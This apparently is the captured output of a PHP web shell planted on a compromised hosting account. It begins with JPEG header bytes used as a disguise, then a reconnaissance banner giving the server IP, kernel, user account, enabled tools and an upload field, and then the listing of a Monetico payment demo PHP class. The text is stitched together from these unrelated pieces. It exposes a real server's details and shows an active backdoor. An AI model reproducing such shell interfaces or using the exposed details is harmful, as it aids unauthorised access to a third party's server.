ÿØÿà JFIF ` ` ÿþxØ
| Server IP : 109.234.164.53 / Your IP : 216.73.216.110 Web Server : Apache System : Linux cervelle.o2switch.net 4.18.0-553.32.1.lve.el8.x86_64 #1 SMP Thu Dec 19 13:14:03 UTC 2024 x86_64 User : computer3 ( 1098) PHP Version : 7.1.33 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/computer3/litsolide.com/CE_payment/Monetico/Examples/Response/ |
Upload File : |
<?php
namespace MoneticoDemoWebKit\Examples\Response;
/**
* Example of a basic payment response
*/
class BasicPaymentResponseExample extends PaymentResponseExample
{
public function getName()
{
return "Basic payment example";
}
public function getDescription()
{
return "This is an example of a response that the Monetico platform can send you once a payment has been done.";
}
protected function getResponseParametersWithoutMac()
{
return [
"TPE" => TPE,
"date" => "25/05/2020_a_14:31:27",
"montant" => "123.45EUR",
"reference" => "ref143106",
"texte-libre" => "Do not forget to HTML-encode every field value otherwise characters like < or > might cause issues",
"code-retour" => "payetest",
"cvx" => "oui",
"vld" => "1223",
"brand" => "VI",
"numauto" => "000000",
"usage" => "inconnu",
"typecompte" => "particulier",
"ecard" => "non",
"originecb" => "FRA",
"bincb" => "000001",
"hpancb" => "6C0F3557D7297149ECCD58CBD6205273F0F3DA7A",
"ipclient" => "127.0.0.1",
"originetr" => "ZZZ",
"modepaiement" => "CB",
"authentification" => "ewogICAiZGV0YWlscyIgOiB7CiAgICAgICJQQVJlcyIgOiAiWSIsCiAgICAgICJWRVJlcyIgOiAiWSIsCiAgICAgICJzdGF0dXMzRFMiIDogMQogICB9LAogICAicHJvdG9jb2wiIDogIjNEU2VjdXJlIiwKICAgInN0YXR1cyIgOiAiYXV0aGVudGljYXRlZCIsCiAgICJ2ZXJzaW9uIiA6ICIxLjAuMiIKfQo="
];
}
}